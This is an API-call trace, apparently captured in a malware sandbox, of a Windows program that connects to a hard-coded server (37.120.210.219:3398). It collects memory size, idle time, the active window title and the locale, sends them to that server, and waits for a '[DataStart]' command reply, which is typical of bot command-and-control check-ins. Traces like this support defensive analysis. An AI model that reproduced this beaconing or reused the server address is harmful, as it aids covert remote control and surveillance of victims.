[0228.129] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x19f9a4 | out: lpWSAData=0x19f9a4) returned 0
[0228.136] socket (af=0, type=1, protocol=6) returned 0x1e0
[0228.527] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z () returned 0x19fb34
[0228.527] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x19fb24
[0228.527] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z () returned 0x19fb04
[0228.527] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x20
[0228.528] ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z () returned 0xe
[0228.528] ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z () returned 0x19fae4
[0228.528] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x19fb04
[0228.528] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.528] ??2@YAPAXI@Z () returned 0x2206c70
[0228.528] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206c70
[0228.528] free (_Block=0x0)
[0228.528] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x1
[0228.528] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x20
[0228.528] ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z () returned 0x13
[0228.528] ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z () returned 0x19fae4
[0228.528] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x19fb04
[0228.528] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.528] ??2@YAPAXI@Z () returned 0x2202d30
[0228.528] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2202d30
[0228.528] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2202d40
[0228.528] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.528] free (_Block=0x2206c70)
[0228.528] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x1
[0228.528] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x20
[0228.528] ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z () returned 0xffffffff
[0228.528] ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z () returned 0x19fae4
[0228.528] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x19fb04
[0228.528] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.528] ??2@YAPAXI@Z () returned 0x2200560
[0228.528] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2200560
[0228.528] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2200570
[0228.528] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2200580
[0228.528] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.528] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.528] free (_Block=0x2202d30)
[0228.528] ??2@YAPAXI@Z () returned 0x2202e58
[0228.528] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2202e58
[0228.528] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2202e68
[0228.529] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2202e78
[0228.529] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.529] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.529] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.529] free (_Block=0x2200560)
[0228.529] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.529] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.529] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.529] ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x2206e19
[0228.529] gethostbyname (name="37.120.210.219") returned 0x5413d8*(h_name="37.120.210.219", h_aliases=0x5413e8*=0x0, h_addrtype=2, h_length=4, h_addr_list=0x5413ec*=([0]="37.120.210.219"))
[0229.873] ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x2207239
[0229.873] atoi (_Str="3398") returned 3398
[0229.877] htons (hostshort=0xd46) returned 0x460d
[0229.877] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x415258
[0229.877] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xc
[0229.877] ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x2206f09
[0229.877] connect (s=0x1e0, name=0x415a34*(sa_family=2, sin_port=0xd46, sin_addr="37.120.210.219"), namelen=16) returned 0
[0230.378] ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z () returned 0x0
[0230.378] GlobalMemoryStatusEx (in: lpBuffer=0x19fae8 | out: lpBuffer=0x19fae8) returned 1
[0230.378] sprintf (in: _Dest=0x19fe10, _Format="%I64u" | out: _Dest="4294967296") returned 10
[0230.379] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x19fe38
[0230.379] _itoa (in: _Val=1, _DstBuf=0x19fe4c, _Radix=10 | out: _DstBuf="1") returned="1"
[0230.379] GetTickCount () returned 0x1d48b53
[0230.379] _itoa (in: _Val=30706515, _DstBuf=0x19fae8, _Radix=10 | out: _DstBuf="30706515") returned="30706515"
[0230.379] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z () returned 0x19fbb0
[0230.379] GetLastInputInfo (in: plii=0x19fb04 | out: plii=0x19fb04*(cbSize=0x8, dwTime=0x1d477fa)) returned 1
[0230.379] GetTickCount () returned 0x1d48b53
[0230.379] _itoa (in: _Val=4953, _DstBuf=0x19fae0, _Radix=10 | out: _DstBuf="4953") returned="4953"
[0230.379] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z () returned 0x19fbd0
[0230.379] GetForegroundWindow () returned 0x103ca
[0230.379] GetWindowTextW (in: hWnd=0x103ca, lpString=0x19f8f4, nMaxCount=512 | out: lpString="Nothing Left") returned 12
[0230.379] ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z () returned 0x19fbf0
[0230.379] ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ () returned 0xc
[0230.379] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z () returned 0x19fadc
[0230.379] ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ () returned 0xc
[0230.379] ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ () returned 0x2207dba
[0230.379] ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x2206d89
[0230.379] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x19fc10
[0230.379] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.380] GetLocaleInfoA (in: Locale=0x800, LCType=0x5a, lpLCData=0x19fab4, cchData=3 | out: lpLCData="US") returned 3
[0230.380] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z () returned 0x19fc30
[0230.380] ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ () returned 0x13
[0230.380] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z () returned 0x19fa98
[0230.380] ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ () returned 0x13
[0230.380] ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ () returned 0x2206a02
[0230.380] ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x2207e09
[0230.380] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x19fc50
[0230.380] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.380] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z () returned 0x19fc70
[0230.380] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z () returned 0x19fc90
[0230.380] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z () returned 0x19fcb0
[0230.380] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z () returned 0x19fcd0
[0230.381] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z () returned 0x19fcf0
[0230.381] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z () returned 0x19fd10
[0230.381] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z () returned 0x19fd30
[0230.381] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z () returned 0x19fd50
[0230.381] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z () returned 0x19fd70
[0230.381] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z () returned 0x19fd90
[0230.381] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z () returned 0x19fdb0
[0230.381] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z () returned 0x19fdd0
[0230.381] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z () returned 0x19fde0
[0230.381] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z () returned 0x19fca0
[0230.381] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z () returned 0x19fc00
[0230.381] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z () returned 0x19fcc0
[0230.381] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z () returned 0x19fb80
[0230.381] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z () returned 0x19fce0
[0230.381] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z () returned 0x19fdf0
[0230.381] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z () returned 0x19fd00
[0230.381] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z () returned 0x19fbc0
[0230.381] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z () returned 0x19fd20
[0230.381] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z () returned 0x19fc40
[0230.381] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z () returned 0x19fd40
[0230.382] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z () returned 0x19fb60
[0230.382] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z () returned 0x19fd60
[0230.382] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z () returned 0x19fc60
[0230.382] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z () returned 0x19fd80
[0230.382] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z () returned 0x19fbe0
[0230.382] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z () returned 0x19fda0
[0230.382] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z () returned 0x19fc80
[0230.382] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z () returned 0x19fdc0
[0230.382] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z () returned 0x19fba0
[0230.382] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z () returned 0x19fb34
[0230.382] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x19fb14
[0230.382] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x18a
[0230.382] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z () returned 0x19faf8
[0230.382] ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z () returned 0x2207034
[0230.382] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z () returned 0x19fae8
[0230.382] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x19fb14
[0230.382] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.382] ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ () returned 0x0
[0230.382] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x199
[0230.382] ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x2209c89
[0230.383] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z () returned 0x19fac0
[0230.383] ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x2209e39
[0230.383] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x19fae8
[0230.383] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.383] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x199
[0230.383] ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x2209e39
[0230.383] send (s=0x1e0, buf=0x2209e39*, len=409, flags=0) returned 409
[0230.384] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.384] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.384] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.384] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.384] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.384] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.384] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.384] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.384] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.384] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.384] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.384] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.384] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.384] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.384] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.384] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.384] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.384] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.384] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.384] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.384] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.384] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.384] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.384] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.384] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.384] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.384] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.385] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.385] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.385] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.385] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.385] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.385] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.385] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.385] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.385] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.385] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.385] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.385] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.385] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.385] ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ () returned 0x0
[0230.385] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.385] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.385] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z () returned 0x19fb10
[0230.385] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z () returned 0x19fb20
[0230.385] malloc (_Size=0x3e8) returned 0x2207db8
[0230.385] recv (in: s=0x1e0, buf=0x2207db8, len=1000, flags=0 | out: buf=0x2207db8*) returned 32
[0230.905] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z () returned 0x19fb00
[0230.905] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x19fb10
[0230.905] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.906] ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x19fb20
[0230.906] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z () returned 0x19fac8
[0230.906] ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z () returned 0x1
[0230.906] ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x20
[0230.906] ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x22081f9
[0230.906] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z () returned 0x19fa58
[0230.906] ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x2208249
[0230.906] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x19fab8
[0230.906] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.906] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x19fac8
[0230.906] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.906] ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x2208249
[0230.906] strncmp (_Str1="[DataStart]", _Str2="[DataStart]", _MaxCount=0xb) returned 0
[0230.906] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x20
[0230.906] ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z () returned 0x1
[0230.906] ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z () returned 0x19faa8
[0230.906] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x19fac8
[0230.906] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.906] ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z () returned 0x19fa98
[0230.906] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x19fac8
[0230.906] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.906] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x415a48
[0230.906] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2a8
[0230.906] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x40a71e, lpParameter=0x415a30, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2ac
[0230.907] WaitForSingleObject (hHandle=0x2a8, dwMilliseconds=0xffffffff) returned 0x0
[0230.911] ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z () returned 0x19fa88
[0230.911] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x19fb20
[0230.911] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.911] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x0
[0230.911] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.911] free (_Block=0x2207db8)
